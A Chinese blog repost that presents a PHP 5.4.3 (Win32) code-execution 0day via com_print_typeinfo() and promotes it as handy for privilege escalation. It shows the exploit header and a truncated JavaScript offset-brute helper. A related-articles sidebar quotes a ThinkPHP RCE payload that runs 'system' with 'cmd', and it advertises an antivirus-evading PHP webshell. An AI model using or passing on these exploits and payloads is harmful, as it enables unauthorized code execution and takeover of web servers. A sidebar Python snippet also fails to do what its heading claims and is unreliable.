php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用

最新推荐文章于 2022-09-10 17:34:42 发布
最新推荐文章于 2022-09-10 17:34:42 发布
阅读量802 收藏
点赞数
文章标签: php5.4漏洞解决

PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令

用这个提权是不是很方便了?

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)

// Exploit author: 0in (Maksymilian Motyl)

// Email: 0in(dot)email(at)gmail.com

// * Bug with Variant type parsing originally discovered by Condis

// Tested on Windows XP SP3 fully patched (Polish)

===================

offset-brute.html

===================

0day

PHP 5.4.3 0day by 0in & cOndis

function sleep(milliseconds) {

var start = new Date().getTime();

for (var i = 0; i < 1e7; i++) {

if ((new Date().getTime() - start) > milliseconds){

break;

}

}

}

function makeRequest(url, parameters)

{

var xmlhttp = new XMLHttpRequest();

if (window.XMLHttpRequest) {

xmlhttp = new XMLHttpRequest();

if (xmlhttp.overrideMimeType) {

xmlhttp.overrideMimeType('text/xml');

}

} else if (window.ActiveXObject) {

// IE

try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }

catch (e) {

try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }

catch (e) {}

}

}

if (!xmlhttp) {

alert('Giving up :( Cannot create an XMLHTTP instance');

return false;

}

xmlhttp.open("GET",url,true);

xmlhttp.send(null);

return true;

博书老师
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
e7xue.php漏洞_php5.4.3版本 远程代码执行漏洞
weixin_39737831的博客
12-21 367
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令用这个提权是不是很方便了?保存php文件,代码:// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)em...
php5.4.3的远程代码执行漏洞提权管用
收集盒 Book box
09-20 4620
PHP com_print_typeinfo()的漏洞,通过PHP代码调用”exec”可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)ema
php5.4.x缓冲区溢出,CVE-2018-7584
weixin_33181159的博客
03-11 735
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中的ext/standard/http_fopen_wrapper.c文件的‘php_stream_url_wrap_http_ex’函数存在栈缓冲区溢出漏洞。攻击者可利用该漏洞...
php 5.4漏洞,PHP 5.6 / 5.5 / 5.4 SplDoublyLinkedList Use-After-Free
weixin_42160424的博客
03-17 504
#Yet Another Use After Free Vulnerability in unserialize() withSplDoublyLinkedListTaoguang Chen - Write Date:2015.8.27 - Release Date: 2015.9.4> A use-after-free vulnerability was discovered in un...
Phpstudy后门漏洞复现
qq_56426046的博客
09-10 2206
2019年9月20日,网上传出phpStudy软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHPphp_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码
ThinkPHP 5.X版本网页提权测试(CTF常见题型)
D1FFERENT的博客
10-18 717
ThinkPHP 5.X版本网页提权测试 首先靶机地址http://192.168.1.111 登录 发现版本是thinkphp 5.X版本 果断kali进行搜索tinkphp拼接漏洞 CD到5.X目录下 查看文件 46150.txt 选用一条常用命令 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd 进行url的index.php后拼接
php5.4.3-win32
11-15
2. ** Traits **:Traits 是一种代码重用机制,类似于Java的接口或C++的混合,允许在多个类中复用方法,解决了单一继承的限制。 3. ** Closure 类型提示**:在匿名函数中可以使用类型提示,增强了函数参数的类型...
php-5.4.43-Win32-VC9-x86.zip
11-13
php-5.4.43-Win32-VC9-x86 PHP 环境搭建 PHP版本 动态语言、动态网站开发
PHP扩展mongo 5.4.3
04-16
Mongo是一款用于PHP开发的NoSQL数据库,php_mongo.dll是可以由PHP操作mongoDB数据库,便于在windows下开发学习,适合于5.4.3版本的64位的windows.
php-5.4.3.tar.gz
03-24
'`可以在命令行中快速运行PHP代码进行测试。 7. **社区支持**: - PHP 5.4.3虽已不再维护,但其相关文档和技术论坛仍然可以帮助开发者解决问题。 总结,"php-5.4.3.tar.gz"是一个包含PHP 5.4.3源代码的压缩包,它...
超强php提权大马!过免杀代码
06-14
超强php提权大马!过免杀 代码
php5.4.3开发工具
12-18
总的来说,PHP 5.4.3的发布为开发者提供了更多功能和性能上的改进,使得编写高质量的PHP代码变得更加容易。如果你正在使用这个版本,理解并熟练掌握上述知识点,将有助于提升你的开发效率和代码质量。
PHP imap 远程命令执行漏洞(CVE-2018-19518)
黑白的博客
12-30 968
声明 好好学习,天天向上 漏洞描述 University of Washington IMAP Toolkit 2007f是美国华盛顿大学(University of Washington)的一款IMAP(Internet消息访问协议)工具包。 基于UNIX平台的University of Washington IMAP Toolkit 2007f中的‘imap_open()’函数存在操作系统命令注入漏洞,该漏洞源于程序没有正确的验证server URI。远程攻击者可借助‘imap_rimap’和‘tcp_
php getimagesize漏洞,PHP 'getimagesize()'远程拒绝服务漏洞
weixin_36410567的博客
03-12 203
PHP 5.4.1之前版本在Getimagesize函数的实现时存在安全漏洞,该函数没有验证要下载的远程文件是否是图片,其大小是否过大,导致迫发布日期:2012-04-29更新日期:2012-05-02受影响系统:PHP PHP 5.3.xPHP PHP 5.2.x描述:----------------------------------------------------------------...
phpStudy后门漏洞利用复现
WY92139010的博客
10-01 3802
phpStudy后门漏洞利用复现 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样一款公益性软件,2018年12月4日,...
phpStudy漏洞复现
好好学习,天天向上
02-05 154
漏洞简介 关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886632/article/details/101294081 phpStudy在下列文件中存在后门 phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018...
5.4.16打断点 php_PHP 5.4.16和PHP 5.3.26发布!
weixin_39861498的博客
12-21 258
PHP 5.4.16和PHP 5.3.26发布!发布时间:2013-06-08 09:18:28来源:红联作者:empastPHP 5.4.16/5.3.26发布。2013-06-07 经过1个RC 上个版本是2013-05-09的5.4.15/5.3.25修正了大约15个Bug以及几个安全漏洞。如CVE-2013-2110 开发版本5.5RC3.完全改进:Version 5.4.1606-Jun...
php拒绝服务,PHP远程拒绝服务攻击漏洞修复指引(7.15更新)
weixin_39653717的博客
03-13 771
Jul27PHP远程拒绝服务攻击漏洞修复指引(7.15更新)文 / UCloud 公关部2021-03-042015年5月15日,php官方发布安全漏洞通知,利用该漏洞攻击者可以通过发送一个精心构造的http请求,使服务器的cpu利用率达到100%。导致服务器无法正常工作。目前UCoud经过4天的打补丁、测试、灰度发布等工作已经率先修复该问题。UCloud网站不受该漏洞影响。漏洞描述:php在解析...
统计预测与决策课程实验
最新发布
07-06
内含实验与完整程序
生成多小数点的小数识别,比如5.4.3识别为5.4和0.3
05-10
这个问题可以通过正则表达式来解决。下面是一个Python示例代码: ```python import re # 匹配含有多个小数点的数字 pattern = r'^\d+(\.\d+)*$' # 测试数据 data = '5.4.3' # 匹配数字 match = re.match(pattern, data) if match: # 将数字拆分为小数部分和整数部分 parts = data.split('.') integer_part = parts[0] decimal_part = ''.join(parts[1:]) # 输出结果 print('整数部分:', integer_part) print('小数部分:', decimal_part) else: print('不是数字') ``` 输出结果为: ``` 整数部分: 5 小数部分: 43 ``` 这个代码首先使用正则表达式匹配含有多个小数点的数字。如果输入数据匹配,则将其拆分为整数部分和小数部分。其中,整数部分是第一个小数点之前的数字,小数部分是第一个小数点之后的所有数字。注意,小数部分需要将多个小数点合并成一个数字。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值